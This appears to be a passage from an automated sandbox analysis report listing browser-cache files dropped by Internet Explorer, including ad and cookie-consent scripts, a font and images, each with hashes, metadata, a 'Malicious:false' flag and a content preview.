                                                                                                                                                                                                                  SHA1:9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
                                                                                                                                                                                                                  SHA-256:4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
                                                                                                                                                                                                                  SHA-512:9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\checksync[5].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):204
                                                                                                                                                                                                                  Entropy (8bit):4.753212018409155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:ljggS5oc/bLiuggS5oc/bLiuggS5oc/bL7:+DpxgDpxgDp7
                                                                                                                                                                                                                  MD5:AA0EC763639C9094D9BE1B0D491AC65A
                                                                                                                                                                                                                  SHA1:9A0E137BD9EB21908016360FBB2DAD6AED37CAE4
                                                                                                                                                                                                                  SHA-256:4D2671D4C5D04438C3447C787ADF222D33AB22C91222ABB1B5524ED586B42C01
                                                                                                                                                                                                                  SHA-512:9A812C4C097D864E757CE84D98542EA239150D61184E2BF1BB62EB9E97F8730ADBB96D00F95B0386FC4B93E82347450ADE2A77E5B495708C0438C7DCF5BCEF81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\medianet[1].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):412168
                                                                                                                                                                                                                  Entropy (8bit):5.486628897915568
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:zCGkYqP1vG2jnmuynGJ8nKM03VCuPbDX9cJBprymD:81vFjKnGJ8KMGxTGrymD
                                                                                                                                                                                                                  MD5:369D61EF6285C70F2636B0962611E12F
                                                                                                                                                                                                                  SHA1:AAD44C8A03F7A151C0C748DB562647CC68978B6B
                                                                                                                                                                                                                  SHA-256:C825235692887C41D74901FA744DD6EE61AF7B9FA017C35173FF2FF7D89EBA52
                                                                                                                                                                                                                  SHA-512:A2F376D46A12A9673DC2E9E72CDB4333C6660FD8F82A9A6ECAD0DC8E340E1AE853CD5F23519A4F967F6C75C30DA6648A80C4E242211D4429EEAAC031A8DB8E95
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\medianet[2].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):412168
                                                                                                                                                                                                                  Entropy (8bit):5.48665617963191
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:zCGkYqP1vG2jnmuynGJ8nKM03VCuPbIX9cJBprymD:81vFjKnGJ8KMGxTFrymD
                                                                                                                                                                                                                  MD5:B9E3061F2BE431FB202D1F48550FF4E2
                                                                                                                                                                                                                  SHA1:1D9EECFCD30B2E7255B5C6933EAFECEB337432E5
                                                                                                                                                                                                                  SHA-256:812F84A6222346F9CD85312A34B846BAA4A8E971A777CA35BF9C8359A39E006E
                                                                                                                                                                                                                  SHA-512:CCBEBCF193B7102118D8C561C48813C6BC86D68F22CFC7B49281605B16BB0563021F024D2A697EFB1CDDC00822C4E6FE0F3A14E37EF13A01E8866D49E6BD9678
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nrrV52461[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):91348
                                                                                                                                                                                                                  Entropy (8bit):5.423638505240867
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:uEuukXGs7ui3gn7qeOdillEx5Q3YzuCp9oZuvby3TdXPH6viqQDnjs2i:aKiw0di378uQMfHgjV
                                                                                                                                                                                                                  MD5:9C4A60B2332E94D3BFF324BD8DF61A31
                                                                                                                                                                                                                  SHA1:6245D60C273E175D3EC798CE8ABB65AD75F24E09
                                                                                                                                                                                                                  SHA-256:8C38115211EB4E291CE6F38629C8AEE0F882EBED06B66F3DB3D6587C1EBDF52F
                                                                                                                                                                                                                  SHA-512:31830D8DE79206C5C5B178DBC798D3A2AF597BA14D9075EE25CC82B096083B180B0B41CB5DC24640AC2A8329575102A3D724DA1F4307DDFB57DBC5C64A873817
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\otBannerSdk[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):325178
                                                                                                                                                                                                                  Entropy (8bit):5.3450457320873355
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:7Kk89fToixHtGt3mBC4VcW3fUAbJ7Kz0yzGO:acixHMPzfJ
                                                                                                                                                                                                                  MD5:56B5E93BFB078B9EEF2BA41DB521EA9B
                                                                                                                                                                                                                  SHA1:A61A4949BCBCA6B8148CC6821D7CF88FBD90062F
                                                                                                                                                                                                                  SHA-256:B8603101616C7960752244D2EC66D2A845BBE0094B83E7CC2877880A3A93402D
                                                                                                                                                                                                                  SHA-512:C10E26F5C9B66E1FA82926AD43C7C70EDF00D3BEBE376DA674B325FB34EDB47EDF490BF84457BBC085BBFA1AF37D92F20067AA46B1334D623D2AE80B66810C02
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: /** .. * onetrust-banner-sdk.. * v6.25.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var v,e,r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function p(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\otSDKStub[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19145
                                                                                                                                                                                                                  Entropy (8bit):5.333194115540307
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:7RoViYMusfTaiBMFHRy0I2VMwG4JRuIKBf:7aViMsffBMnktf
                                                                                                                                                                                                                  MD5:0D2A3807FB77D862C97924D018C7B04C
                                                                                                                                                                                                                  SHA1:9D17F3621001D08F7B98395AC571FC5F6CDA7FEF
                                                                                                                                                                                                                  SHA-256:75DE71E7FEAC92082AF2F49B7079C0B587B16A5E2BB4DABDA7E7EB66327402FB
                                                                                                                                                                                                                  SHA-512:409ABCD5E970CAFF9F489D3E7F3D9464B2C5189118D2D046CA99E42CEC630C2C65B30397B8A87C3860E3426CF9F7E0A5F86511539CA9D9AEDA26C74CA9055922
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,A,b,y,v,C,I,w,S,L,T,R,B,D,P,_,E,G,U,O,k,F,V,N,x,j,H,M,K,z,q,W,J,Y,Q,X,Z,$,ee=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                  MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                  SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                  SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                  SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\4996b9[1].woff
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\55a804ab-e5c6-4b97-9319-86263d365d28[2].json
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3278
                                                                                                                                                                                                                  Entropy (8bit):4.87966793369991
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:Oy9Dwb40zrvdip5GKZa6AyYs9vjxWCKTS2jQt4ZaX:zqlipc6vxLCSCbZaX
                                                                                                                                                                                                                  MD5:073E1A67C16B7E2B0F240F20BAC53174
                                                                                                                                                                                                                  SHA1:778663FBA0201814BE193EB38E4F9D8875F322ED
                                                                                                                                                                                                                  SHA-256:886E0D5D43DFB17D92EB8C5C80AB0671ED9DE247EC4AD9D71B358F32F7613287
                                                                                                                                                                                                                  SHA-512:97FA869A8BE850E759BDB5AAA0E850B787358CC4EED55796F6B51D1AFD5B6B25CF7A6FAC5FCD67AA9588876F208D40449ED94886046177B6FEAA083743B01696
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","gb","ws","gd","ge","gg"
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AA6wTdK[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):550
                                                                                                                                                                                                                  Entropy (8bit):7.444195674983303
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7jGhB1J/EfQCF2bAVNvYxZxdgQ+JIy9XD5hb6Fg9a6:ZJOf0APgfG+o1oFgc6
                                                                                                                                                                                                                  MD5:6468CE276C808DA186AEF8AA10AB8DCC
                                                                                                                                                                                                                  SHA1:F11A97DE272DAE4A61EC9990DEA171EFCF39B742
                                                                                                                                                                                                                  SHA-256:CF782CC89F554E9ACF21D36909F6AC19DDE218BF0250179B48CDAB67728912B8
                                                                                                                                                                                                                  SHA-512:6439670A62A38D289374812D5DACCE219D01E19F5CC4CEC4105F72BA703BF70078FC92DFD2A2C43669AA78EE8D03121E234E53DD3C73DF6CFB984049CE36370C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..R.O.Q.=...Z.mq0-0`M....t...0qqjM.... .tq.&R..p...$......0P.R'.M.A.#......=H.(1......s..}.oGOC.:.M.&..S>...W.....t...^..}......b.F6.R..,.PN...n...@_[...4.+.]..-4K...54........w.....r{..3...9W.~.>;.G@.F...Q.Bx..AW....J.g|.B.q../..._M...T.4.....j.G......}B7..`..B1.!...w3.hW.....+...p...D......&,#.h...D........T.....V...H..`...,,..........Qb.h..g.a~<..............K.p,...|......@S.l5.?.r).&....<{ad3.P.,M...H..W........SI%.WX.q>..8.....Z.V.n.U.......\..... ..7....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AAMqFmF[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):553
                                                                                                                                                                                                                  Entropy (8bit):7.46876473352088
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                                                                                                                                                                                                  MD5:DE563FA7F44557BF8AC02F9768813940
                                                                                                                                                                                                                  SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                                                                                                                                                                                                  SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                                                                                                                                                                                                  SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....RQ......%AD.Vn$R...]n\.........Z..f.....\.A.~.f \H2(2.J.uT.i.u.....0P..s..}.....P..........l...*..P.....~...tb...f,.K.;.X.V...^..x<.b...lr8...bt.]..<.h.d2I.T2...sz...@.p8.x<..pH...g:...DX.Vt:.......eR..$...E.d2I..d..b.R.0...]. .j...v..A....j......H...=....@.'Z^....E|>..tZv".^...#l.[yk(.B<j..#.H..dp.\..m....."#...b.l6.7.-.Q...l6.<.#.H.....\|.....>/^.......eL.....9.z.....lwy....*.g..h?...<...zG...c\d......q.3o9.Y.3.|..Jg...%.t.?>....+..6.0.m.....X.q........IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARkL8h[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9123
                                                                                                                                                                                                                  Entropy (8bit):7.913864579468599
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QoLz6er02KZU5SQ6lw554KoxySuYhQ8DeR+cdiA9q7/e:bn6pZUT6lw+1uYi8yocbp
                                                                                                                                                                                                                  MD5:578B116678B72272439230A0C549BFC6
                                                                                                                                                                                                                  SHA1:8BE6E8A2A519A70AB9CCA1BDA753C4CB8DA01D69
                                                                                                                                                                                                                  SHA-256:CAC42425E1B679517E84258E10633CA542A9AB1C6511F547B0A4A45372824E2D
                                                                                                                                                                                                                  SHA-512:F53886EE798F50C35184133DE55493FF83842C515BDB96574FD72A57592528B84BC283369E12EF8BF9D78B1F7E80D9C1B284CB08D221ECF142DE496C8800B72E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....S..b.....#..?..?Jcg.R.P.@........z.`..Q@.@.@....P......0.@.@..!....8...@b....-_.X~.......=..i..ZB25....`...(..?.."..8...j.........c.-..&....4.*.....t..c......7....;,w.......R.reN..*H..'WS.....9?Z.m.(.........(.E...-............2s..X.R3(rpx...6....(...1.....:.3<b......@...<Mj...T.u^%.~.nc....+........\5..'.z.X.K.........D..Kn.....(.....K!....a.....3~.b}......._..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARlNEA[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25557
                                                                                                                                                                                                                  Entropy (8bit):7.890712621033468
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:IGbQD7DTOsNFKciKw7fOIZucZz56e1IhoMFxlS:I7D7H3Spr7fVZZz531KHlS
                                                                                                                                                                                                                  MD5:A204DC197046409012D95FCFD2F804D8
                                                                                                                                                                                                                  SHA1:6018513305B0F74F6065AC89380FF3222B52A9FE
                                                                                                                                                                                                                  SHA-256:CB82F8E195A6FB6A048349BFC701A4698FC180DCCFB7C9CCE0F131A71E4CDA91
                                                                                                                                                                                                                  SHA-512:123219631949099A9BE3BD317B398EBEE84CF5421B0C01918D97F21E63FDEF29810FFEBEBF21747BBAF4A114926731D7245139200F62C93C598C95F501853E1B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...s0...........P..0.A@......-.-...P.@.......P.@.......u....j$.*.=...."...q..Bb..>Q...S-..6kb.95.-..*F8.......<U"Yj"..D2bj..Q.qE.M.*.h..AC\.b....4.C.\.@:6!.).KF....k...#a........5.........(..........(..BP0.....!.b..).(.(........(.(....!h......(....A@..-...P.@.@.....(.h..A@....Z.(...Y.)f<P3.Y...?.d..R..\.H.....`.U.W.\..D..o...R"..fP...H.E8.D...J......H.....s....Zc.1J.b.d.8.l......
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARlOdR[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
